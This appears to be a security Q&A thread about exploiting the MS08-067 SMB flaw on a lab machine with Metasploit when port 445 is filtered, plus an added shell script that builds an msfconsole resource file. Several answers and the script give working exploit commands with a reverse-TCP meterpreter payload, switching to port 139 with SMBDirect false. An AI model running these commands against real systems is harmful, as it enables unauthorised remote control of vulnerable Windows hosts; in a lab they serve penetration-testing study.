
I'm doing some pentesting against a machine the lecturer set up in the lab. NMAP shows port 445 to be filtered and Nessus confirms the ms08_067 vulnerability is present on that machine.

I tried running Metasploit against it the normal way:

use exploit/windows/smb/ms08_067_netapi
set RHOST TARGET_IP
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST MY_IP
exploit

It tells me:

[-] Exploit failed [unreachable]: Rex::ConnectionRefused The connection was refused by the remote host (192.168.2.2:445)

I'm guessing the exploit is failing because port 445 is filtered. The thing that has me puzzled is that Nessus can apparently check that the vulnerability is present. Since Nessus can do that through the filtered port, is there a way I can launch the exploit through a filtered port? Are there any Metasploit settings that need to be arranged?

Juicy

6 Answers


You have contradictory information: Nmap says the port is filtered but Nessus says that the vulnerability is present on the system. They cannot both be true; one of these must be wrong. Given that Metasploit is unable to connect, it is likely that Nessus is reporting incorrectly, or is basing the vulnerability report on information gleaned from other open ports. If you look at Tenable's page on that advisory you will see that Nessus can test for it using port 139 or port 445, so 139 is probably open, and may be exploitable.

GdD

tl;dr No, you won't be able to directly exploit this vulnerability through a filtered port, and it can't be detected in this way. There must be something else going on in your scenario.

Why?

If this port is coming back as filtered then a firewall or IPS is dropping packets, meaning you won't be receiving any response from the server. This flaw (MS08-067) can only be detected by Nessus if the vulnerability scanner can establish an SMB connection to this port. Nessus won't automatically be attempting to bypass the firewall in any way, but it might be doing a different kind of port scan that could yield different results.

Possible reasons for the results you are seeing:

  • Nessus might be detecting the vulnerability on a different port, probably NetBIOS over TCP (NBT) on TCP/139. Check the Nessus report carefully. In this case you would need to set RPORT 139 and also set SMBDirect false. The latter is an advanced option (show advanced).

  • Some kind of intrusion prevention is running between you and the target host (or on the target host) which is leading to inconsistent port scan results. Try running Nmap in various configurations (-sS, -sT, -p445,139 etc.) to see if the results are consistent. This doesn't really explain why Nessus would be able to detect it but it not be exploitable by Metasploit, though. It also seems unlikely in a lab environment, unless the lab has specifically been set up for IPS evasion.

itscooper

Even if port 445 (SMB) is closed, you may sometimes be able to exploit this vulnerability through port 139 (NetBIOS). In Metasploit, just use the following syntax:

set RPORT 139; set SMBDirect false; exploit

Anders
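The two answers above both come down to the same decision: if raw SMB on TCP/445 answers, the module's defaults (RPORT 445, SMBDirect true) are right; if only the NetBIOS session service on TCP/139 answers, set RPORT 139 and SMBDirect false. The script below is an added example, not code from the thread or from the Metasploit project: it reads Nmap grepable output (-oG) for ports 139 and 445, picks the port/SMBDirect pair accordingly, and emits an msfconsole resource script. The scan output is a constructed sample, and the target and LHOST addresses are placeholders.

```shell
#!/bin/sh
# Added example (not from the original thread): map Nmap's view of TCP/139
# and TCP/445 onto the RPORT/SMBDirect settings of
# exploit/windows/smb/ms08_067_netapi and write an msfconsole resource file.
#
# Assumptions: Nmap "grepable" output (-oG) is used, which has one "Host:"
# line per host with a "Ports:" field of comma-separated
# "port/state/proto/owner/service/..." entries. IP addresses are placeholders.

# Constructed sample of `nmap -sS -p139,445 -oG - 192.168.2.2`: 445 is
# filtered (no reply at all) while 139 is open, matching the thread's symptom.
SAMPLE_SCAN=$(printf '# Nmap scan initiated\nHost: 192.168.2.2 ()\tPorts: 139/open/tcp//netbios-ssn///, 445/filtered/tcp//microsoft-ds///\tIgnored State: closed (0)\n# Nmap done\n')

# port_state SCAN PORT -> prints the state Nmap recorded for PORT
# (open, filtered, closed, open|filtered) or "unknown" if it was not scanned.
port_state() {
    scan=$1
    port=$2
    state=$(printf '%s\n' "$scan" \
        | grep '^Host:' \
        | tr ',' '\n' \
        | sed -n "s#.*[[:space:]]${port}/\([a-z|]*\)/tcp.*#\1#p" \
        | head -n 1)
    printf '%s\n' "${state:-unknown}"
}

# choose_port SCAN -> prints "PORT SMBDIRECT":
#   "445 true"  when raw SMB on 445 is open (module defaults),
#   "139 false" when only the NetBIOS session service on 139 is open,
#   "none"      when neither port is open (filtered/closed: nothing to exploit).
choose_port() {
    scan=$1
    if [ "$(port_state "$scan" 445)" = open ]; then
        echo "445 true"
    elif [ "$(port_state "$scan" 139)" = open ]; then
        echo "139 false"
    else
        echo "none"
    fi
}

# write_rc SCAN RHOST LHOST -> prints a resource script for `msfconsole -r`.
# Returns 1 and prints nothing when no SMB port is open, so a caller never
# fires the module at a filtered port and gets Rex::ConnectionRefused again.
write_rc() {
    scan=$1; rhost=$2; lhost=$3
    choice=$(choose_port "$scan")
    [ "$choice" = none ] && return 1
    rport=${choice% *}
    smbdirect=${choice#* }
    cat <<EOF
use exploit/windows/smb/ms08_067_netapi
set RHOST $rhost
set RPORT $rport
set SMBDirect $smbdirect
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST $lhost
exploit
EOF
}

# Usage with the constructed sample: 445 is filtered, so the resource script
# falls back to RPORT 139 with SMBDirect false.
write_rc "$SAMPLE_SCAN" 192.168.2.2 192.168.2.10
```

Save the output as ms08_067.rc and run `msfconsole -r ms08_067.rc`. The point of checking both ports first is that a "filtered" 445 means no packets come back at all, so no Metasploit option will make that port usable; the only thing worth trying is the other SMB transport, and the script refuses to emit anything when neither is open.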

"Filtered" usually means that no response was received from the port (as opposed to closed, which responds with an RST packet; see Port Scanner on Wikipedia). This usually indicates that a firewall is just dropping the packets that go to that port, and it is unlikely that it will be exploitable.

valentinas

You might be able to use the BNAT-Suite (also included in Metasploit) technique or the Nmap NSE firewallbypass technique to punch through the firewall or IP filtering mechanism.

atdre

I got the same problem. My nmap scan with smb-vuln-ms08-067 on ports 139 and 445 showed the scanned system was vulnerable, but the exploit didn't work.

set RPORT 139

and

set SMBDirect false

worked for me (thanks to Ricardo Reimao; I wanted to comment but it didn't work).

I've tried to set the port to 139 before but didn't know about the SMBDirect option.

I was wondering why msf didn't show me the option when typing in "show options" and found out you can show more options with the command "show advanced":

msf exploit(windows/smb/ms08_067_netapi) > show advanced

Module advanced options (exploit/windows/smb/ms08_067_netapi):

   Name                    Current Setting    Required  Description
   ----                    ---------------    --------  -----------
   ...
   SMBDirect               false              no        The target port is a raw SMB service (not NetBIOS)
   ...

Towky